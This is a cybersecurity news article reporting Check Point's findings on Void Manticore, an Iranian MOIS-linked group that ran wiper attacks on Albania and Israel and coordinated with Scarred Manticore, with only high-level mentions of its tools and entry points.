An Iranian threat actor affiliated with the Ministry of Intelligence and Security (MOIS) has been identified as the perpetrator of destructive wiping attacks targeting Albania and Israel under the aliases Homeland Justice and Karma, respectively.
Cybersecurity firm Check Point is monitoring the group’s activities under the name Void Manticore, also known as Storm-0842 (previously DEV-0842) by Microsoft.
“There are significant similarities in the targets of Void Manticore and Scarred Manticore, indicating a systematic transfer of targets between the two groups for carrying out destructive activities against victims,” the company stated in a report released today.
This threat actor is known for launching disruptive cyber attacks against Albania since July 2022 as Homeland Justice, using customized wiper malware named Cl Wiper and No-Justice (also known as LowEraser).
Similar wiper malware assaults have been directed at Windows and Linux systems in Israel following the Israel-Hamas conflict post-October 2023, employing another unique wiper code-named BiBi. The pro-Hamas hacktivist group operates under the name Karma.
The group’s attack chains are described as “simple and straightforward,” utilizing publicly available tools and exploiting Remote Desktop Protocol (RDP), Server Message Block (SMB), and File Transfer Protocol (FTP) for lateral movement prior to deploying malware.
Initial access is often gained by exploiting known vulnerabilities in internet-facing applications (e.g., CVE-2019-0604), as per an advisory issued by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in September 2022.
Following successful infiltration, the group deploys web shells, including a customized one named Karma Shell that disguises as an error page but can perform various functions like enumerating directories, creating processes, uploading files, and managing services.
There are suspicions that Void Manticore has utilized access obtained by Scarred Manticore (also known as Storm-0861) to conduct its intrusions, showcasing a coordinated approach between the two threat actors.
This level of cooperation was previously highlighted by Microsoft in its investigation into attacks against Albanian governments in 2022, where multiple Iranian actors participated and were responsible for distinct phases:
- Storm-0861 gained initial access and exfiltrated data
- Storm-0842 deployed ransomware and wiper malware
- Storm-0166 exfiltrated data
- Storm-0133 probed victim infrastructure
It is noted that Storm-0861 is believed to be a subordinate element within APT34 (also known as Cobalt Gypsy, Hazel Sandstorm, Helix Kitten, and OilRig), an Iranian nation-state group known for the Shamoon and ZeroCleare wiper malware.
Check Point stated, “The similarities in attack techniques against Israel and Albania, as well as the coordination between the two actors, suggest a routine process for these malicious activities conducted by Void Manticore.”
“Void Manticore’s operations blend psychological warfare with actual data destruction through wiping attacks and public data leaks, intensifying the impact on the targeted organizations.”
